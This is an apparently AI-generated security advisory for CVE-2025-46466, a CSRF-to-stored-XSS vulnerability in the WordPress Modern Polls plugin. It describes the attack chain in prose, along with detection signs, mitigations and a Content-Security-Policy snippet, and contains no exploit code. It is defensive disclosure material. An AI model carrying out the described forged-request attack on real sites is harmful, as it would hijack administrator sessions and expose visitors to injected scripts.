CVE-2025-46466 Overview
CVE-2025-46466 is a Cross-Site Request Forgery (CSRF) vulnerability in the WordPress Modern Polls plugin developed by felixtz. This security flaw enables attackers to chain CSRF with Stored Cross-Site Scripting (XSS), allowing malicious actors to inject persistent scripts into the WordPress site through forged requests. When a logged-in administrator visits a malicious page, the attacker can exploit the lack of CSRF protection to inject XSS payloads that persist in the application and execute in the browsers of subsequent visitors.
Critical Impact
Attackers can leverage this CSRF-to-Stored-XSS chain to hijack administrator sessions, inject malicious scripts, deface websites, redirect visitors to phishing pages, or steal sensitive user data from the affected WordPress installation.
Affected Products
- WordPress Modern Polls plugin version 1.0.10 and earlier
- All WordPress installations running the vulnerable Modern Polls plugin versions
Discovery Timeline
- 2025-04-24 - CVE-2025-46466 published to NVD
- 2026-04-23 - Last updated in NVD database
Technical Details for CVE-2025-46466
Vulnerability Analysis
This vulnerability combines two attack vectors: Cross-Site Request Forgery (CSRF) and Stored Cross-Site Scripting (XSS). The Modern Polls plugin fails to implement proper CSRF token validation on its administrative endpoints, allowing attackers to craft malicious requests that execute in the context of an authenticated administrator's session.
The attack requires user interaction, specifically the victim must be authenticated as an administrator and visit a malicious page controlled by the attacker. Once the CSRF attack succeeds, the injected XSS payload becomes stored in the database and persists across page loads, affecting all users who subsequently view the compromised poll content.
The vulnerability affects confidentiality, integrity, and availability with limited impact in each area. The scope is changed, meaning the vulnerable component (the plugin) can impact resources beyond its security scope, potentially affecting the broader WordPress installation and its visitors.
Root Cause
The root cause of this vulnerability is the absence of proper anti-CSRF token verification in the Modern Polls plugin's administrative functions combined with insufficient output encoding when rendering user-controlled data. The plugin fails to validate that state-changing requests originate from the legitimate application interface, and does not properly sanitize stored data before rendering it in the browser.
Attack Vector
The attack is network-based and requires user interaction. An attacker must craft a malicious webpage or email containing a hidden form or JavaScript that targets the vulnerable endpoints in the Modern Polls plugin. When an authenticated WordPress administrator visits the attacker-controlled page, the browser automatically sends the forged request with the admin's session cookies. The malicious payload then gets stored in the database, where it executes whenever the affected poll content is rendered.
The attack does not require any privileges on the target system, as the attacker leverages the victim administrator's existing authenticated session to perform the malicious action.
Detection Methods for CVE-2025-46466
Indicators of Compromise
- Unexpected JavaScript code or HTML elements in poll question or answer fields
- Suspicious outbound network requests from the WordPress site to unknown domains
- Unusual administrator activity patterns, particularly poll modifications without corresponding legitimate admin sessions
- Browser console errors related to Content Security Policy violations when viewing polls
Detection Strategies
- Review WordPress database entries for the Modern Polls plugin for unexpected script tags or event handlers
- Monitor HTTP access logs for requests to Modern Polls administrative endpoints with external referrer headers
- Implement Content Security Policy headers to detect and block inline script execution
- Deploy web application firewall rules to detect XSS payload patterns in POST requests
Monitoring Recommendations
- Enable detailed logging for all WordPress administrative actions
- Configure alerts for modifications to poll content outside of normal administrative workflows
- Monitor for JavaScript execution from stored content in poll displays
- Implement file integrity monitoring to detect unauthorized changes to plugin files
How to Mitigate CVE-2025-46466
Immediate Actions Required
- Disable or remove the Modern Polls plugin if not essential to site functionality
- Audit existing poll content for any injected malicious scripts or suspicious HTML
- Clear any cached pages that may contain stored XSS payloads
- Review administrator session logs for suspicious activity patterns
Patch Information
Currently, no patch has been confirmed for this vulnerability. The issue affects Modern Polls version 1.0.10 and all earlier versions. Administrators should monitor the Patchstack Vulnerability Report for updates on available fixes.
Workarounds
- Remove the Modern Polls plugin entirely until a security patch is available
- Implement a Web Application Firewall (WAF) with CSRF and XSS protection rules
- Restrict administrative access to trusted IP addresses only
- Add Content-Security-Policy headers to mitigate XSS impact
- Ensure administrators do not browse untrusted websites while logged into WordPress
# Add Content-Security-Policy header in .htaccess as a defense-in-depth measure
<IfModule mod_headers.c>
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; object-src 'none';"
</IfModule>
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
